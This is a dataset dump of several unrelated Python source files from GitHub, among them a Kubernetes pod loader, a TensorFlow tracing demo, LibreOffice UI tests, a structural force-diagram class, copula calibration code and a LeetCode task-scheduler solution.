)\n return pods\n\n\ndef load_pods(session: Session, data: List[Dict], update_tag: int) -> None:\n ingestion_cypher_query = \"\"\"\n UNWIND $pods as k8pod\n MERGE (pod:KubernetesPod {id: k8pod.uid})\n ON CREATE SET pod.firstseen = timestamp()\n SET pod.lastupdated = $update_tag,\n pod.name = k8pod.name,\n pod.status_phase = k8pod.status_phase,\n pod.created_at = k8pod.creation_timestamp,\n pod.deleted_at = k8pod.deletion_timestamp\n WITH pod, k8pod.namespace as ns, k8pod.cluster_uid as cuid, k8pod.containers as k8containers\n MATCH (cluster:KubernetesCluster {id: cuid})-[:HAS_NAMESPACE]->(space:KubernetesNamespace {name: ns})\n MERGE (space)-[rel1:HAS_POD]->(pod)\n ON CREATE SET rel1.firstseen = timestamp()\n SET rel1.lastupdated = $update_tag\n WITH pod, space, cluster, k8containers\n UNWIND k8containers as k8container\n MERGE (container: KubernetesContainer {id: k8container.uid})\n ON CREATE SET container.firstseen = timestamp()\n SET container.image = k8container.image,\n container.status_image_id = k8container.status.image_id,\n container.status_image_sha = k8container.status.image_sha,\n container.status_ready = k8container.status.ready,\n container.status_started = k8container.status.started,\n container.status_state = k8container.status.state,\n container.name = k8container.name,\n container.lastupdated = $update_tag\n WITH pod, space, cluster, container\n MERGE (pod)-[rel2:HAS_CONTAINER]->(container)\n ON CREATE SET rel2.firstseen = timestamp()\n SET rel2.lastupdated = $update_tag\n WITH pod, space, container\n MERGE (cluster)-[rel3:HAS_POD]->(pod)\n ON CREATE SET rel3.firstseen = timestamp()\n SET rel3.lastupdated = $update_tag\n \"\"\"\n logger.info(f\"Loading {len(data)} kubernetes pods.\")\n session.run(ingestion_cypher_query, pods=data, update_tag=update_tag)\n","repo_name":"lyft/cartography","sub_path":"cartography/intel/kubernetes/pods.py","file_name":"pods.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":2765,"dataset":"github-code","pt":"52"} +{"seq_id":"10128381135","text":"from __future__ import print_function\n\nimport tensorflow as tf\nfrom tensorflow.python.client import timeline\nimport socket\nhost = socket.gethostname()\n\nrun_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE, output_partition_graphs=True)\nrun_metadata = tf.RunMetadata()\n\n\"\"\"\n# Basic constant operations\n# The value returned by the constructor represents the output\n# of the Constant op.\na = tf.constant(2, name=\"a\")\nb = tf.constant(3, name=\"b\")\n\n\n# Launch the default graph.\nwith tf.Session() as sess:\n print(\"a=2, b=3\")\n print(\"Addition with constants: %i\" % sess.run(a+b, options=run_options, run_metadata=run_metadata))\n print(\"Multiplication with constants: %i\" % sess.run(a*b, options=run_options, run_metadata=run_metadata))\n\n# Basic Operations with variable as graph input\n# The value returned by the constructor represents the output\n# of the Variable op. (define as input when running session)\n# tf Graph input\na = tf.placeholder(tf.int16, name=\"a\")\nb = tf.placeholder(tf.int16, name=\"b\")\n\n# Define some operations\nadd = tf.add(a, b, \"add\")\nmul = tf.multiply(a, b, \"mul\")\n\n# Launch the default graph.\nwith tf.Session() as sess:\n # Run every operation with variable input\n print(\"Addition with variables: %i\" % sess.run(add, feed_dict={a: 2, b: 3}, options=run_options, run_metadata=run_metadata))\n print(\"Multiplication with variables: %i\" % sess.run(mul, feed_dict={a: 2, b: 3}, options=run_options, run_metadata=run_metadata))\n\n\"\"\"\n\n# ----------------\n# More in details:\n# Matrix Multiplication from TensorFlow official tutorial\n\na = tf.placeholder(tf.int32, name=\"a\", shape=(1,1))\nb = tf.placeholder(tf.int32, name=\"b\", shape=(1,1))\n\n# Create a Matmul op that takes 'matrix1' and 'matrix2' as inputs.\n# The returned value, 'product', represents the result of the matrix\n# multiplication.\nproduct = tf.matmul(a, b)\n\n# To run the matmul op we call the session 'run()' method, passing 'product'\n# which represents the output of the matmul op. This indicates to the call\n# that we want to get the output of the matmul op back.\n#\n# All inputs needed by the op are run automatically by the session. They\n# typically are run in parallel.\n#\n# The call 'run(product)' thus causes the execution of threes ops in the\n# graph: the two constants and matmul.\n#\n# The output of the op is returned in 'result' as a numpy `ndarray` object.\nwith tf.Session() as sess:\n result = sess.run(product, feed_dict={a: [[1.]], b: [[10.]]}, options=run_options, run_metadata=run_metadata)\n print(result)\n # ==> [[ 12.]]\n\n\n\"\"\"\n# ----------------\n# More in details:\n# Matrix Multiplication from TensorFlow official tutorial\n\n# Create a Constant op that produces a 1x2 matrix. The op is\n# added as a node to the default graph.\n#\n# The value returned by the constructor represents the output\n# of the Constant op.\nmatrix1 = tf.constant([[3., 3.]])\n\n# Create another Constant that produces a 2x1 matrix.\nmatrix2 = tf.constant([[2.],[2.]])\n\n# Create a Matmul op that takes 'matrix1' and 'matrix2' as inputs.\n# The returned value, 'product', represents the result of the matrix\n# multiplication.\nproduct = tf.matmul(matrix1, matrix2)\n\n# To run the matmul op we call the session 'run()' method, passing 'product'\n# which represents the output of the matmul op. This indicates to the call\n# that we want to get the output of the matmul op back.\n#\n# All inputs needed by the op are run automatically by the session. They\n# typically are run in parallel.\n#\n# The call 'run(product)' thus causes the execution of threes ops in the\n# graph: the two constants and matmul.\n#\n# The output of the op is returned in 'result' as a numpy `ndarray` object.\nwith tf.Session() as sess:\n result = sess.run(product, options=run_options, run_metadata=run_metadata)\n print(result)\n # ==> [[ 12.]]\n\"\"\"\n\n# Create the Timeline object, and write it to a json\ntl = timeline.Timeline(run_metadata.step_stats)\nctf = tl.generate_chrome_trace_format(show_memory=True)\nsess.close()\nwith open('trace_' + __file__[:-3] + \"_\" + host + '.json', 'w') as f:\n f.write(ctf)\n","repo_name":"pzins/dorsal","sub_path":"old_files/basic_operations.py","file_name":"basic_operations.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29169998050","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n\nfrom uitest.framework import UITestCase\nfrom uitest.uihelper.common import get_state_as_dict\nfrom uitest.uihelper.common import type_text\nfrom libreoffice.uno.propertyvalue import mkPropertyValues\nfrom org.libreoffice.unotest import systemPathToFileUrl\nfrom tempfile import TemporaryDirectory\nimport os.path\n\nclass edit_file_properties_before_saving(UITestCase):\n\n def change_doc_info_setting(self, enabled):\n with self.ui_test.execute_dialog_through_command(\".uno:OptionsTreeDialog\") as xDialog:\n xPages = xDialog.getChild(\"pages\")\n xLoadSaveEntry = xPages.getChild('1')\n xLoadSaveEntry.executeAction(\"EXPAND\", tuple())\n xGeneralEntry = xLoadSaveEntry.getChild('0')\n xGeneralEntry.executeAction(\"SELECT\", tuple())\n\n xDocInfo = xDialog.getChild(\"docinfo\")\n if get_state_as_dict(xDocInfo)['Selected'] != enabled:\n xDocInfo.executeAction(\"CLICK\", tuple())\n self.assertEqual(enabled, get_state_as_dict(xDocInfo)['Selected'])\n\n def test_tdf117895(self):\n\n with TemporaryDirectory() as tempdir:\n xFilePath = os.path.join(tempdir, \"tdf117895-temp.odt\")\n\n try:\n self.change_doc_info_setting(\"true\")\n\n with self.ui_test.create_doc_in_start_center(\"writer\"):\n\n # Save Copy as\n with self.ui_test.execute_dialog_through_command('.uno:SaveAs', close_button=\"\") as xDialog:\n xFileName = xDialog.getChild('file_name')\n xFileName.executeAction('TYPE', mkPropertyValues({'KEYCODE':'CTRL+A'}))\n xFileName.executeAction('TYPE', mkPropertyValues({'KEYCODE':'BACKSPACE'}))\n xFileName.executeAction('TYPE', mkPropertyValues({'TEXT': xFilePath}))\n\n xOpen = xDialog.getChild(\"open\")\n with self.ui_test.execute_dialog_through_action(xOpen, \"CLICK\") as xPropertiesDialog:\n xReadOnly = xPropertiesDialog.getChild(\"readonly\")\n xReadOnly.executeAction(\"CLICK\", tuple())\n self.assertEqual(\"true\", get_state_as_dict(xReadOnly)['Selected'])\n\n with self.ui_test.load_file(systemPathToFileUrl(xFilePath)) as doc2:\n # Without the fix in place, this test would have failed here\n self.assertTrue(doc2.isReadonly())\n finally:\n # Put this setting back to false, otherwise it might affect other tests\n self.change_doc_info_setting(\"false\")\n\n def test_tdf119206(self):\n\n with TemporaryDirectory() as tempdir:\n xFilePath = os.path.join(tempdir, \"tdf119206-temp.odt\")\n\n try:\n self.change_doc_info_setting(\"true\")\n\n with self.ui_test.create_doc_in_start_center(\"writer\"):\n\n xWriterDoc = self.xUITest.getTopFocusWindow()\n xWriterEdit = xWriterDoc.getChild(\"writer_edit\")\n type_text(xWriterEdit, \"XXXX\")\n\n # Close document and save\n with self.ui_test.execute_dialog_through_command('.uno:CloseDoc', close_button=\"\") as xConfirmationDialog:\n xSave = xConfirmationDialog.getChild(\"save\")\n\n with self.ui_test.execute_dialog_through_action(xSave, \"CLICK\", close_button=\"\") as xDialog:\n xFileName = xDialog.getChild('file_name')\n xFileName.executeAction('TYPE', mkPropertyValues({'KEYCODE':'CTRL+A'}))\n xFileName.executeAction('TYPE', mkPropertyValues({'KEYCODE':'BACKSPACE'}))\n xFileName.executeAction('TYPE', mkPropertyValues({'TEXT': xFilePath}))\n\n xOpen = xDialog.getChild(\"open\")\n with self.ui_test.execute_dialog_through_action(xOpen, \"CLICK\") as xPropertiesDialog:\n # Without the fix in place, this test would have crashed here\n xReadOnly = xPropertiesDialog.getChild(\"readonly\")\n xReadOnly.executeAction(\"CLICK\", tuple())\n self.assertEqual(\"true\", get_state_as_dict(xReadOnly)['Selected'])\n\n with self.ui_test.load_file(systemPathToFileUrl(xFilePath)) as doc2:\n self.assertTrue(doc2.isReadonly())\n\n finally:\n # Put this setting back to false, otherwise it might affect other tests\n self.change_doc_info_setting(\"false\")\n\n# vim: set shiftwidth=4 softtabstop=4 expandtab:\n","repo_name":"LibreOffice/core","sub_path":"sw/qa/uitest/writer_tests6/edit_file_properties_before_saving.py","file_name":"edit_file_properties_before_saving.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":2194,"dataset":"github-code","pt":"52"} +{"seq_id":"11170756306","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom compas.datastructures import mesh_dual\nfrom compas_ags.diagrams import Diagram\nfrom compas.geometry import Line\n\n\n__all__ = [\"ForceDiagram\"]\n\n\nclass ForceDiagram(Diagram):\n \"\"\"Mesh-based data structure for force diagrams in AGS.\"\"\"\n\n def __init__(self):\n super(ForceDiagram, self).__init__()\n self.attributes.update({\"name\": \"Force\"})\n self.update_default_vertex_attributes({\"is_fixed\": False, \"line_constraint\": None, \"is_param\": False})\n self.update_default_edge_attributes({\"l\": 0.0, \"target_vector\": None})\n\n # --------------------------------------------------------------------------\n # Constructors\n # --------------------------------------------------------------------------\n\n @classmethod\n def from_formdiagram(cls, formdiagram):\n \"\"\"Construct a force diagram from a form diagram.\n\n Parameters\n ----------\n formdiagram : :class:`compas_tna.diagrams.FormDiagram`\n The form diagram.\n\n Returns\n -------\n :class:`compas_ags.diagrams.ForceDiagram`\n \"\"\"\n forcediagram = mesh_dual(formdiagram, cls)\n forcediagram.dual = formdiagram\n formdiagram.dual = forcediagram\n return forcediagram\n\n # --------------------------------------------------------------------------\n # Convenience functions for retrieving attributes of the force diagram.\n # --------------------------------------------------------------------------\n\n def xy(self):\n \"\"\"The XY coordinates of the vertices.\n\n Returns\n -------\n list\n \"\"\"\n return self.vertices_attributes(\"xy\")\n\n def fixed(self):\n \"\"\"The identifiers of the fixed vertices.\n\n Returns\n -------\n list\n \"\"\"\n return list(self.vertices_where({\"is_fixed\": True}))\n\n def anchor(self):\n \"\"\"Get an anchor to the force diagram.\n\n Returns\n -------\n int\n \"\"\"\n return next(self.vertices())\n\n # --------------------------------------------------------------------------\n # Helpers\n # --------------------------------------------------------------------------\n\n def edges_where_dual(self, conditions, data=False):\n \"\"\"Get edges for which a certain condition or set of conditions is true for the corresponding edges in the diagram's dual.\n\n Parameters\n ----------\n conditions : dict\n A set of conditions in the form of key-value pairs.\n The keys should be attribute names. The values can be attribute\n values or ranges of attribute values in the form of min/max pairs.\n data : bool, optional\n Yield the edges and their data attributes.\n Default is ``False``.\n\n Yields\n ------\n 2-tuple\n The next edge as a (u, v) tuple, if ``data=False``.\n The next edge as a ((u, v), data) tuple, if ``data=True``.\n\n Examples\n --------\n >>>\n\n \"\"\"\n for edge in list(self.edges()):\n is_match = True\n\n dual_edge = self.dual_edge(edge)\n dual_edge_attr = self.dual.edge_attributes(dual_edge)\n\n for cond_name, cond_value in conditions.items():\n dual_method = getattr(self.dual, cond_name, None)\n\n if dual_method and callable(dual_method):\n dual_value = dual_method(dual_edge)\n elif cond_name in dual_edge_attr:\n dual_value = dual_edge_attr[cond_name]\n else:\n is_match = False\n break\n\n if isinstance(dual_value, list):\n if cond_value not in dual_value:\n is_match = False\n break\n elif isinstance(cond_value, (tuple, list)):\n minval, maxval = cond_value\n if dual_value < minval or dual_value > maxval:\n is_match = False\n break\n else:\n if cond_value != dual_value:\n is_match = False\n break\n\n if is_match:\n if data:\n yield edge, self.edge_attributes(edge)\n else:\n yield edge\n\n def dual_edge(self, edge):\n \"\"\"Find the cooresponding edge in the diagram's dual.\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n tuple (int, int) or None\n The identifier of the dual edge if it exists.\n \"\"\"\n for u, v in self.dual.face_halfedges(edge[0]):\n if self.dual.halfedge[v][u] == edge[1]:\n if self.dual.has_edge((u, v)):\n return u, v\n return v, u\n\n def is_dual_edge_external(self, edge):\n \"\"\"Verify if the corresponding edge in the diagram's dual is marked as \"external\".\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n bool\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"is_external\")\n\n def is_dual_edge_reaction(self, edge):\n \"\"\"Verify if the corresponding edge in the diagram's dual is marked as \"reaction\".\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n bool\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"is_reaction\")\n\n def is_dual_edge_load(self, edge):\n \"\"\"Verify if the corresponding edge in the diagram's dual is marked as \"load\".\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n bool\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"is_load\")\n\n def is_dual_edge_ind(self, edge):\n \"\"\"Verify if the corresponding edge in the diagram's dual is marked as \"independent\".\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n bool\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"is_ind\")\n\n def dual_edge_force(self, edge):\n \"\"\"Retrieve the force in the corresponding edge of the diagram's dual.\n\n Parameters\n ----------\n edge : tuple(int, int)\n The edge identifier.\n\n Returns\n -------\n float\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"f\")\n\n def dual_edge_angledeviation(self, edge):\n \"\"\"Retrieve the angle deviation in the corresponding edge of the diagram's dual.\n\n Parameters\n ----------\n edge : tuple(int, int)\n The edge identifier.\n\n Returns\n -------\n float\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"a\")\n\n def dual_edge_targetforce(self, edge):\n \"\"\"Retrieve the target force in the corresponding edge of the diagram's dual.\n\n Parameters\n ----------\n edge : tuple(int, int)\n The edge identifier.\n\n Returns\n -------\n float\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"target_force\")\n\n def edge_index(self, form=None):\n \"\"\"Construct a mapping between the identifiers of edges and the corresponding indices in a list of edges.\n\n Parameters\n ----------\n form : :class:`compas_ags.diagrams.FormDiagram`, optional\n If a form diagra is provided as reference, the list of edges is ordered such that it corresponds\n to the natural ordering of edges in the form diagram.\n\n Returns\n -------\n dict\n Mapping between edge identifiers and the correpsonding indices of the edges in a list.\n\n \"\"\"\n if not form:\n return {edge: index for index, edge in enumerate(self.edges())}\n edge_index = dict()\n for index, (u, v) in enumerate(form.edges()):\n f1 = form.halfedge[u][v]\n f2 = form.halfedge[v][u]\n edge_index[f1, f2] = index\n # the weird side-effect of this is that edges get rotated if necessary\n return edge_index\n\n def ordered_edges(self, form):\n \"\"\" \"Construct a list of edges with the same order as the corresponding edges of the form diagram.\n\n Parameters\n ----------\n form : :class:`compas_ags.diagrams.FormDiagram`\n\n Returns\n -------\n list\n \"\"\"\n edge_index = self.edge_index(form=form)\n index_edge = {index: edge for edge, index in edge_index.items()}\n edges = [index_edge[index] for index in range(self.number_of_edges())]\n return edges\n\n # --------------------------------------------------------------------------\n # Helpers\n # --------------------------------------------------------------------------\n\n def constraints_from_dual(self, tol=10e-4):\n \"\"\" \"Reflect constraints from the form diagram in the force diagram.\n\n Returns\n -------\n ForceDiagram is modified in place.\n \"\"\"\n edge_index = self.dual.edge_index()\n ordered_edges = self.ordered_edges(self.dual)\n edges_orient = []\n\n for edge in self.edges_where_dual({\"is_ind\": True}): # Fix vertices of dual independent edge\n self.vertices_attribute(\"is_fixed\", True, keys=edge)\n edges_orient.append(edge)\n\n for edge in self.edges_where_dual(\n {\"is_load\": True}\n ): # If loads are orthogonal the force dual edge gets constrained\n self.edge_attribute(edge, \"is_load\", True)\n edges_orient.append(edge)\n sp, ep = self.edge_coordinates(*edge)\n line = Line(sp, ep)\n self.vertices_attribute(\"line_constraint\", value=line, keys=edge)\n\n for edge in self.edges_where_dual({\"is_reaction\": True}):\n self.edge_attribute(edge, \"is_reaction\", True)\n edges_orient.append(edge)\n\n for form_edge in self.dual.edges():\n target_vector = self.dual.edge_attribute(form_edge, \"target_vector\")\n index = edge_index[form_edge]\n force_edge = ordered_edges[index]\n if target_vector is not None:\n edges_orient.append(force_edge)\n\n for edge in edges_orient:\n edge = edge if edge in list(self.edges()) else (edge[1], edge[0])\n sp, ep = self.edge_coordinates(*edge)\n dx = ep[0] - sp[0]\n dy = ep[1] - sp[1]\n length = (dx**2 + dy**2) ** 0.5\n self.edge_attribute(edge, \"target_vector\", [dx / length, dy / length])\n\n # def compute_constraints(self, form, M):\n # r\"\"\"Computes the form diagram constraints used\n # in compas_bi_ags.bi_ags.graphstatics.form_update_from_force_direct\n\n # Parameters\n # ----------\n # form : compas_ags.diagrams.formdiagram.FormDiagram\n # The form diagram to update.\n # M\n # The matrix described in compas_bi_ags.bi_ags.graphstatics.form_update_from_force_direct\n # \"\"\"\n # import numpy as np\n # nr_col_jac = M.shape[1]\n # constraint_rows = np.zeros((0, M.shape[1]))\n # residual = np.zeros((0, 1))\n # vcount = form.number_of_vertices()\n\n # # Currently this computes two constraints per fixed vertex in the form diagram.\n # for i, (key, attr) in enumerate(form.vertices(True)):\n # if not attr['is_fixed']:\n # continue\n\n # # Handle x\n # constraint_jac_row = np.zeros(\n # (1, nr_col_jac)) # Added row for jacobian\n # # Lock horizontal position\n # constraint_jac_row[0, i] = 1\n # constraint_rows = np.vstack((constraint_rows, constraint_jac_row))\n # residual = np.vstack((residual, attr['x']))\n\n # # Handle y\n # constraint_jac_row = np.zeros(\n # (1, nr_col_jac)) # Added row for jacobian\n # # Lock horizontal position\n # constraint_jac_row[0, i+vcount] = 1\n # constraint_rows = np.vstack((constraint_rows, constraint_jac_row))\n # residual = np.vstack((residual, attr['y']))\n # return constraint_rows, residual\n\n\n# ==============================================================================\n# Main\n# ==============================================================================\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"BlockResearchGroup/compas_ags","sub_path":"src/compas_ags/diagrams/forcediagram.py","file_name":"forcediagram.py","file_ext":"py","file_size_in_byte":12845,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"74100782565","text":"#https://stackoverflow.com/questions/2846653/how-to-use-threading-in-python\r\n\r\nimport os\r\nimport sys\r\nimport math\r\nimport threading\r\n\r\nclass SummingThread(threading.Thread):\r\n def __init__(self,low,high):\r\n super(SummingThread, self).__init__()\r\n self.low=low\r\n self.high=high\r\n self.total=0\r\n\r\n def run(self):\r\n for i in range(self.low,self.high):\r\n self.total+=i\r\n print(self.total)\r\n\r\n\r\nclass Main_Thread(threading.Thread):\r\n result = 0\r\n \r\n def __init__(self,low,high):\r\n super(Main_Thread, self).__init__()\r\n self.low = low\r\n self.high = high\r\n\r\n def run(self):\r\n thread1 = SummingThread(self.low,self.high)\r\n thread2 = SummingThread(self.high,(self.high*2)+1)\r\n thread1.start() # This actually causes the thread to run\r\n thread2.start()\r\n thread1.join()\r\n thread2.join()\r\n print(thread1.total,thread2.total)\r\n print(\"\\n\")\r\n # At this point, both threads have completed\r\n self.result = thread1.total + thread2.total\r\n \r\n \r\n\r\nmt = Main_Thread(0,5)\r\nmt.start()\r\nprint(mt.result)\r\nmt.join()\r\n\r\n \r\n","repo_name":"e-Yantra-OpenSource/3day-workshop","sub_path":"Python/threadexample.py","file_name":"threadexample.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33402374197","text":"import re\n\nGREEN = '\\033[32m'\nENDC = '\\033[0m'\n\ndef getFormattedResponseText(response): \n formattedResponse = ''\n substrings = re.split('(```.*?```)', response, flags=re.DOTALL)\n\n for substring in substrings:\n substr = substring\n if substr.startswith('```'):\n substr = GREEN + substring + ENDC\n \n formattedResponse = formattedResponse + substr\n\n return formattedResponse","repo_name":"mattinordstrom/gptcli","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12680879182","text":"import math\nimport numpy\nfrom scipy.stats import norm, kendalltau, t\nfrom scipy.special import gammaln, gamma\n\nfrom distribution import EmpiricalDistribution\nfrom copula import GaussianCopula, StudentTCopula\n\n\n\ndef returns(adjusted_prices):\n dimension, no_of_observations = adjusted_prices.shape\n returns = numpy.zeros((dimension, no_of_observations - 1))\n for i in xrange(dimension):\n for j in xrange(1, no_of_observations):\n returns[i, j-1] = math.log(adjusted_prices[i, j]/adjusted_prices[i, j-1])\n return returns\n\n\ndef transformed_variates(observations):\n dimension, no_of_observations = observations.shape\n variates = numpy.zeros((dimension, no_of_observations))\n for i in xrange(dimension):\n marginal = EmpiricalDistribution(observations[i])\n for j in xrange(no_of_observations):\n variates[i, j] = norm.ppf(marginal.cdf(observations[i, j]))\n return variates\n\n\ndef uniform_variates(observations):\n dimension, no_of_observations = observations.shape\n variates = numpy.zeros((dimension, no_of_observations))\n for i in xrange(dimension):\n marginal = EmpiricalDistribution(observations[i])\n for j in xrange(no_of_observations):\n variates[i, j] = marginal.cdf(observations[i, j])\n return variates\n\ndef transformedTVariates(observations):\n dimension, noOfObservations = observations.shape\n variates = numpy.zeros((dimension, noOfObservations))\n for i in xrange(dimension):\n marginal = EmpiricalDistribution(observations[i])\n for j in xrange(noOfObservations):\n variates[i, j] = marginal.cdf(observations[i, j])\n return variates\n\nclass GaussianCalibrator(object):\n\n def calibrate(self, adjustedPrices):\n return self.calibrate_from_returns(returns(adjustedPrices))\n\n def calibrate_from_returns(self, returns):\n return self.calibrate_from_variates(transformed_variates(returns))\n\n def calibrate_from_variates(self, variates):\n dimension, no_of_observations = variates.shape\n covariance = numpy.zeros((dimension, dimension))\n for i in xrange(dimension):\n for j in xrange(i+1):\n tot = 0.0\n for k in xrange(no_of_observations):\n tot += variates[i, k]*variates[j, k]\n covariance[i, j] = tot/no_of_observations\n covariance[j, i] = covariance[i, j]\n return GaussianCopula(covariance)\n\n\nclass StudentTCalibrator(object):\n MAXIMUM_NU_VALUE = 10.0\n DELTA = 0.2\n\n def __init__(self, maximumNuValue, delta):\n self.maximumNuValue = maximumNuValue\n self.delta = delta\n\n def calibrate(self, adjustedPrices):\n return self.calibrateFromReturns(returns(adjustedPrices))\n\n def calibrateFromReturns(self, returns):\n return self.calibrateFromVariates(transformedTVariates(returns))\n\n def calibrateFromVariates(self, variates):\n dimension, noOfObservations = variates.shape\n covarianceData = self.covariance(variates)\n sigma = numpy.array(covarianceData)\n nu = self.optimalNu(variates, sigma, covarianceData)\n return StudentTCopula(covarianceData, nu)\n\n def covariance(self, variates):\n dimension, noOfObservations = variates.shape\n covarianceData = numpy.zeros([dimension, dimension])\n for i in xrange(dimension):\n for j in xrange(i + 1):\n tau, pv = kendalltau(variates[i], variates[j])\n covarianceData[i, j] = math.sin(math.pi/2.0 * tau)\n covarianceData[j, i] = covarianceData[i, j]\n return covarianceData\n\n def optimalNu(self, variates, sigma, covariance):\n dimension, noOfObservations = variates.shape\n sigmaInverse = numpy.linalg.inv(sigma)\n determinant = numpy.linalg.det(sigma)\n nu = 2.0\n argMax = 0.0\n maxValue = float(\"-inf\")\n while nu <= self.maximumNuValue:\n a = gammaln(0.5 * (nu + dimension)) - gammaln(0.5 * nu) - 0.5 * dimension * math.log(nu)\n b = 0.5 * (dimension * math.log(math.pi) + math.log(determinant))\n tCopula = StudentTCopula(covariance, nu)\n value = 0.0\n ld = 0.0\n for j in xrange(noOfObservations):\n variate = numpy.zeros(dimension)\n for i in xrange(dimension):\n variate[i] = t.ppf(variates[i, j], nu)\n ld += math.log(t.pdf(variate[i], nu))\n variateVector = numpy.array(variate)\n value += math.log(1.0 + numpy.dot(variateVector, numpy.dot(sigmaInverse, variateVector)) / nu)\n value = noOfObservations * (a - b) - 0.5 * (nu + dimension) * value - ld\n if value > maxValue:\n maxValue = value\n argMax = nu\n nu += self.delta\n return argMax\n\n # def logLikelihood(self, variate, sigma, nu):\n # dimension = variate.size\n # tVariate = numpy.array([variate[i] for i in xrange(dimension)])\n # observation = numpy.array([tVariate[i] for i in xrange(dimension)])\n # variateVector = numpy.array(observation)\n # sigmaInverse = numpy.linalg.inv(sigma)\n # determinant = numpy.linalg.det(sigma)\n # a = 0.0\n # b = 0.0\n # value = math.log(gamma(0.5 * (nu + dimension)) / gamma(0.5 * nu)) - dimension * math.log(gamma(0.5 * (nu + 1.0)) / gamma(0.5 * nu)) - 0.5 * math.log(determinant)\n # a = math.log(1.0 + numpy.dot(variateVector, numpy.dot(sigmaInverse, variateVector)) / nu)\n # b = 0.0\n # for i in xrange(dimension):\n # b += math.log(1.0 + tVariate[i] * tVariate[i] / nu)\n # value += 0.5 * ((nu + 1.0) * b - (nu + dimension) * a)\n # return value\n","repo_name":"neotrinity/cqf","sub_path":"bcd/copy_calibration.py","file_name":"copy_calibration.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"3108113367","text":"# Given a char array representing tasks CPU need to do. It contains capital lett\n# ers A to Z where different letters represent different tasks. Tasks could be don\n# e without original order. Each task could be done in one interval. For each inte\n# rval, CPU could finish one task or just be idle. \n# \n# However, there is a non-negative cooling interval n that means between two sa\n# me tasks, there must be at least n intervals that CPU are doing different tasks \n# or just be idle. \n# \n# You need to return the least number of intervals the CPU will take to finish \n# all the given tasks. \n# \n# \n# \n# Example: \n# \n# \n# Input: tasks = [\"A\",\"A\",\"A\",\"B\",\"B\",\"B\"], n = 2\n# Output: 8\n# Explanation: A -> B -> idle -> A -> B -> idle -> A -> B.\n# \n# \n# \n# \n# Note: \n# \n# \n# The number of tasks is in the range [1, 10000]. \n# The integer n is in the range [0, 100]. \n# \n# Related Topics Array Greedy Queue\nfrom typing import List\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom collections import Counter\nimport heapq as h\n\n\nclass Solution:\n def leastInterval(self, tasks: List[str], n: int) -> int:\n tc = Counter(tasks)\n task_heap = [(-cnt, task) for task, cnt in tc.items()]\n h.heapify(task_heap)\n\n intervals = 0\n cooling_tasks_heap = []\n while len(task_heap) > 0 or len(cooling_tasks_heap) > 0:\n if len(task_heap) > 0:\n neg_cnt, task = h.heappop(task_heap)\n if neg_cnt < -1:\n h.heappush(cooling_tasks_heap, (intervals, neg_cnt + 1, task))\n while len(cooling_tasks_heap) > 0:\n last_run_interval, neg_cnt, task = cooling_tasks_heap[0]\n if last_run_interval + n <= intervals:\n h.heappop(cooling_tasks_heap)\n h.heappush(task_heap, (neg_cnt, task))\n else:\n break\n intervals += 1\n return intervals\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\ndef test():\n ts = [('AAABBB', 2, 8)]\n s = Solution()\n for tasks, n, ans in ts:\n actual = s.leastInterval(tasks, n)\n print(tasks, n, ans, actual)\n assert actual == ans\n","repo_name":"sunilnandihalli/leetcode","sub_path":"editor/en/[621]Task Scheduler.py","file_name":"[621]Task Scheduler.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37023385801","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\spacecomponents\\server\\components\\activate.py\r\nimport logging\r\nfrom carbon.common.lib import const\r\nfrom eve.common.script.mgt.appLogConst import eventSpaceComponentBeginActivating, eventSpaceComponentActivated\r\nimport datetimeutils\r\nfrom eveexceptions import UserError\r\nfrom spacecomponents.common.componentConst import ACTIVATE_CLASS\r\nfrom spacecomponents.common.components.component import Component\r\nfrom spacecomponents.server.messages import MSG_ON_ACTIVE\r\nfrom timedilation import SimTimeToWallclockTime, WallclockTimeToSimTime\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass Activate(Component):\r\n\r\n def __init__(self, itemID, typeID, attributes, componentRegistry):\r\n Component.__init__(self, itemID, typeID, attributes, componentRegistry)\r\n self.eventLogger = 